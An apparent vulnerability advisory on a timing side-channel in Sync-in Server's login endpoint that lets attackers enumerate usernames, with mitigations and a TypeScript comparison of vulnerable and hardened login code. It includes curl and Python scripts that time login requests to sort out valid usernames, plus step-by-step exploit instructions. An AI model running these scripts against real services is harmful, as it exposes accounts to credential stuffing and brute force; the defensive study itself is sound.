The `/api/auth/login` endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application’s response time. The vulnerability is a classic timing side‑channel (CWE‑208) that arises because the authentication logic follows different execution paths depending on whether a username exists in the system.
The vulnerable code can be found in the `users-queries.service.ts` file, specifically at lines 91‑95 in the commit 7868bb2b3025f92e6c38087456304758713971b2. The flaw is that when an invalid username is submitted, the backend short‑circuits the authentication process early, skipping computationally expensive operations such as hashing and comparing passwords. This short‑circuiting results in a much faster response time. Conversely, when a valid username is provided, the server proceeds to the full authentication routine, including password hashing and verification, which adds significant processing time.
An attacker can exploit this by sending a series of POST requests to the `/api/auth/login` endpoint with different usernames while measuring the time it takes for the server to respond. The difference in response time between a valid and an invalid username is large enough to be reliably detected over a network. The TickTock Enum Burp Suite extension was used to validate the finding, showing that valid usernames returned in 350‑400ms on average, while invalid ones returned in only 95‑100ms.
This timing discrepancy allows an unauthenticated remote attacker to build a list of valid usernames, which can then be used to mount more targeted attacks such as credential stuffing, brute‑force login attempts, or social engineering campaigns.
dailycve form:
Platform: Sync-in Server
Version: commit 7868bb2b3025f92e6c38087456304758713971b2
Vulnerability: Username Enumeration
Severity: Moderate
Date: 2026-04-14
Prediction: 2026-04-28
What Undercode Say:
Simulate timing-based username enumeration using curl and time:

```bash
# Send one login attempt per candidate username and time each request
for username in admin user test support; do
  echo -n "$username: "
  time curl -s -X POST https://target.com/api/auth/login \
    -H "Content-Type: application/json" \
    -d "{\"username\":\"$username\",\"password\":\"dummy\"}" > /dev/null
done
```
Python script to automate the timing measurement:

```python
import requests
import time

url = "https://target.com/api/auth/login"
usernames = ["admin", "user", "test", "support"]
timings = {}

for username in usernames:
    start = time.time()
    response = requests.post(url, json={"username": username, "password": "dummy"})
    elapsed = (time.time() - start) * 1000  # convert seconds to milliseconds
    timings[username] = elapsed
    print(f"{username}: {elapsed:.2f} ms")

threshold = 200  # ms; sits between the ~100 ms and ~350 ms clusters observed above
valid = [u for u, t in timings.items() if t > threshold]
print(f"Valid usernames: {valid}")
```
Exploit:
1. Identify the login endpoint (e.g., `/api/auth/login`).
2. Generate a list of candidate usernames.
   - For each candidate, send a login request with an arbitrary password.
   - Measure the response time using network monitoring tools or scripted timers.
   - Compare the response times: times above ~200ms indicate a valid username.
   - Use the discovered valid usernames for further attacks.
Protection from this CVE:
- Ensure that the authentication endpoint always executes a password hash comparison, even for non‑existent users.
- Introduce a constant‑time delay or use a fake password hash for invalid usernames to mask timing differences.
- Implement rate limiting on the login endpoint to slow down enumeration attempts.
- Monitor for anomalous spikes in login requests that could indicate a timing attack.
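The first two protections above amount to one rule: the unknown-user path must do the same expensive work as the known-user path. The following is an added example, not Sync-in's code and not taken from `users-queries.service.ts`; it uses an in-memory user store, Node's built-in `scrypt` as the password hash, and hypothetical function names `loginVulnerable` and `loginHardened`. The vulnerable shape mirrors the short-circuit the advisory describes; the hardened shape verifies against a precomputed dummy credential when the username does not exist, so both branches pay for one hash. A call counter makes the difference in work visible without relying on wall-clock timing.

```typescript
import { scryptSync, randomBytes, timingSafeEqual } from "crypto";

// Constructed in-memory user store (hypothetical schema, not Sync-in's).
interface StoredUser {
  username: string;
  salt: Buffer;
  hash: Buffer;
}

// scrypt parameters: deliberately expensive, which is exactly why skipping
// the hash on the unknown-user path leaks information.
const SCRYPT_PARAMS = { N: 16384, r: 8, p: 1 };
const KEY_LEN = 64;

function hashPassword(password: string, salt: Buffer): Buffer {
  return scryptSync(password, salt, KEY_LEN, SCRYPT_PARAMS);
}

function makeUser(username: string, password: string): StoredUser {
  const salt = randomBytes(16);
  return { username, salt, hash: hashPassword(password, salt) };
}

// Sample data, constructed for this example.
const users = new Map<string, StoredUser>([
  ["alice", makeUser("alice", "correct horse battery staple")],
]);

// Dummy credential, generated once at startup. When a username does not
// exist the hardened path verifies the submitted password against this
// instead of returning early, so it costs the same as a real verification.
const DUMMY_SALT = randomBytes(16);
const DUMMY_HASH = hashPassword(randomBytes(32).toString("hex"), DUMMY_SALT);

// Instrumentation only: counts hash computations so a test can show that
// the hardened path does equal work regardless of whether the user exists.
let hashCalls = 0;
function getHashCalls(): number {
  return hashCalls;
}
function resetHashCalls(): void {
  hashCalls = 0;
}

// Vulnerable shape (the pattern the advisory describes): an unknown username
// returns before any hashing, so the response is measurably faster.
function loginVulnerable(username: string, password: string): boolean {
  const user = users.get(username);
  if (!user) {
    return false; // short-circuit: no hash, no compare
  }
  hashCalls++;
  const candidate = hashPassword(password, user.salt);
  return timingSafeEqual(candidate, user.hash);
}

// Hardened shape: always hash and always compare. The existence check is
// folded into the final result only after the work has been done.
function loginHardened(username: string, password: string): boolean {
  const user = users.get(username);
  const salt = user ? user.salt : DUMMY_SALT;
  const expected = user ? user.hash : DUMMY_HASH;
  hashCalls++;
  const candidate = hashPassword(password, salt);
  const match = timingSafeEqual(candidate, expected); // fixed 64-byte compare
  return user !== undefined && match; // match is already computed; no skipped work
}
```

The remaining timing difference between the two hardened branches is the store lookup, which is small next to a deliberately slow password hash; it still makes sense to keep the rate limiting from the list above, since that caps how many samples an observer can collect. Note that `timingSafeEqual` on its own would not have fixed this flaw: the leak comes from skipping the hash entirely, not from how the hash is compared.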
Impact:
An unauthenticated remote attacker can enumerate valid usernames, significantly weakening the application’s security posture. This information can be used to launch targeted brute‑force attacks, credential stuffing, social engineering, and other focused attacks against the system.
Sources:
Reported By: github.com